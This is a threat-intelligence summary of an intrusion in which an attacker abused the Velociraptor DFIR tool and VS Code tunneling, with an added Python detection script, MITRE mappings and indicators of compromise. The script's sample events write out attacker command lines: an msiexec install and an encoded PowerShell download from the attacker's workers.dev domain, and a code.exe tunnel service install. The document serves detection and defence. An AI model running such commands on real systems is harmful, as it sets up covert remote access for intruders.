Counter Threat Unit (CTU) researchers analyzed an August 2025 intrusion in which an attacker deployed the legitimate Velociraptor DFIR tool and then used it to stage and run Visual Studio Code with tunneling enabled, most likely to open a tunnel to an attacker-controlled command and control (C2) server and obtain remote code execution. The attacker hosted both the installers and the C2 endpoint on Cloudflare Workers domains (files.qaubctgg.workers.dev, velo.qaubctgg.workers.dev). The activity triggered a Taegis alert that allowed the host to be contained before what was likely an impending ransomware deployment. #Velociraptor #VisualStudioCode
Keypoints
- Attackers used msiexec to download and install Velociraptor from a Cloudflare Workers staging domain (files.qaubctgg.workers.dev).
- Velociraptor was configured to communicate with the C2 at velo.qaubctgg.workers.dev.
- An encoded PowerShell command downloaded Visual Studio Code (code.exe) from the same staging folder and executed it with the tunnel option enabled.
- Visual Studio Code was installed as a service with output redirected to a log file to maintain persistence and enable remote access.
- Taegis detected the VS Code tunneling activity, prompting Sophos analysts to advise isolating the affected host and apply further remediations that stopped the attacker from reaching their objectives.
- Analysis indicates the activity was likely a precursor to ransomware deployment; defenders should treat unauthorized DFIR or RMM tool use as high-risk.
- Sophos protections Troj/Agent-BLMR, Troj/BatDl-PL, and Troj/Mdrop-KDK detect related activity; recommended mitigations include deploying EDR, monitoring for unexpected DFIR or RMM tools, restricting access, and maintaining tested backups.
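The keypoints above describe a chain that is visible almost entirely in process-creation telemetry: msiexec fetching a package over HTTP(S), an encoded PowerShell downloader, code.exe started with the tunnel option, and code.exe wrapped in a service. The following script is an added example (not from the report or from Sophos) that runs a rule per stage over constructed Sysmon-style (image, command line) pairs, decoding any -EncodedCommand payload so the rules also see what the script does. The sample command lines, file paths, and the hypothetical host name "ws01" are assumptions; only the two workers.dev domains come from the report.

```python
import base64
import binascii
import re

# Staging/C2 domains from the report's IOC section.
IOC_DOMAINS = {"files.qaubctgg.workers.dev", "velo.qaubctgg.workers.dev"}

# One regex per stage of the chain in the keypoints.
MSI_REMOTE_RE = re.compile(r"/(?:i|package|a)\s+[\"']?https?://", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENC_RE = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b", re.I)
TUNNEL_RE = re.compile(r"\bcode(?:\.exe)?[\"']?\s+tunnel\b", re.I)
SERVICE_RE = re.compile(
    r"\bsc(?:\.exe)?\s+create\b.*\bcode\.exe|\bcode(?:\.exe)?[\"']?\s+tunnel\s+service\s+install\b",
    re.I)
WORKERS_RE = re.compile(r"\b[\w.-]+\.workers\.dev\b", re.I)


def decode_encoded_command(blob):
    """Decode a powershell -EncodedCommand value (base64 over UTF-16LE text).
    Returns None for anything that is not a well-formed payload, e.g. a false regex hit."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def encode_command(script):
    """Inverse of decode_encoded_command; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_event(image, cmdline):
    """Return [(stage, detail), ...] for one process-creation event."""
    hits = []
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    scan = cmdline  # text the tunnel/service/domain rules look at

    if exe == "msiexec.exe" and MSI_REMOTE_RE.search(cmdline):
        hits.append(("msiexec remote package (T1105)", cmdline))

    m = ENC_RE.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            scan = cmdline + "\n" + decoded  # hunt inside the decoded script too
            if DOWNLOAD_RE.search(decoded):
                hits.append(("encoded PowerShell downloader (T1059.001)", decoded))

    t = TUNNEL_RE.search(scan)
    if t:
        hits.append(("VS Code tunnel (T1071)", t.group(0)))
    s = SERVICE_RE.search(scan)
    if s:
        hits.append(("code.exe installed as a service (T1543.003)", s.group(0)))

    for host in sorted({h.lower() for h in WORKERS_RE.findall(scan)}):
        label = "report IOC domain" if host in IOC_DOMAINS else "workers.dev staging host"
        hits.append((label, host))
    return hits


def analyze(events):
    """Run analyze_event over (image, cmdline) pairs; returns [(index, stage, detail), ...]."""
    return [(i, stage, detail) for i, (img, cl) in enumerate(events)
            for stage, detail in analyze_event(img, cl)]


# Constructed sample events modelled on the chain in the keypoints (assumed command lines).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\msiexec.exe",
     "msiexec.exe /q /i https://files.qaubctgg.workers.dev/v2.msi"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc " + encode_command(
         "Invoke-WebRequest https://files.qaubctgg.workers.dev/code.exe -OutFile C:\\ProgramData\\code.exe; "
         "C:\\ProgramData\\code.exe tunnel --accept-server-license-terms --name ws01")),
    (r"C:\Windows\System32\cmd.exe",
     'cmd.exe /c "C:\\ProgramData\\code.exe tunnel service install --accept-server-license-terms '
     '> C:\\ProgramData\\code.log 2>&1"'),
    # Benign controls: a local MSI install and an ordinary -ExecutionPolicy invocation.
    (r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Temp\7z2301-x64.msi /qn"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for i, stage, detail in analyze(SAMPLE_EVENTS):
        print(f"event {i}: {stage}: {detail[:90]}")
```

Decoding the payload before matching matters because the downloader verbs, the code.exe tunnel invocation and the staging domain are all inside the base64 blob; a rule that only inspects the raw command line sees nothing but `-enc` and an opaque string. The two benign controls show that a local MSI install and an `-ExecutionPolicy` switch (which shares the `-e` prefix) produce no findings.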
MITRE Techniques
- [T1071] Application Layer Protocol: Used Visual Studio Code tunneling to create a network channel to an attacker-controlled C2 ("...the tool to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command and control (C2) server.")
- [T1105] Ingress Tool Transfer: msiexec was used to download installers (v2.msi, sc.msi) from the Cloudflare Workers staging domain ("...used the Windows msiexec utility to download an installer (v2.msi) from a Cloudflare Workers domain"). Running msiexec against a remote package also maps to T1218.007 (System Binary Proxy Execution: Msiexec).
- [T1059.001] PowerShell: An encoded PowerShell command was used to download and execute Visual Studio Code ("...used an encoded PowerShell command to download Visual Studio Code (code.exe) ... and executed it with the tunnel option enabled.")
- [T1543.003] Create or Modify System Process: Windows Service: Visual Studio Code (code.exe) was installed as a service to maintain persistence ("The threat actor installed code.exe as a service and redirected the output to a log file.")
- [T1219] Remote Access Software: Abuse of the legitimate Velociraptor DFIR tool to gain a foothold and minimize the malware deployed ("...attackers pivoting to using incident response tools to gain a foothold in a network and minimize the amount of malware they deploy."). Note that this is not T1078 (Valid Accounts), which covers credential abuse rather than tool abuse.
Indicators of Compromise
- [Domain] Staging and C2 domains used to host installers and C2: files.qaubctgg.workers.dev, velo.qaubctgg.workers.dev
- [File name] Downloaded installer and executable names observed: v2.msi (Velociraptor installer), sc.msi (additional malware), code.exe (Visual Studio Code binary)
- [Tool/process] Utilities and tools used in the intrusion: msiexec (used to download/install .msi files), encoded PowerShell command (used to download and execute code.exe)
- [Detection names] Sophos detections for related activity: Troj/Agent-BLMR, Troj/BatDl-PL, Troj/Mdrop-KDK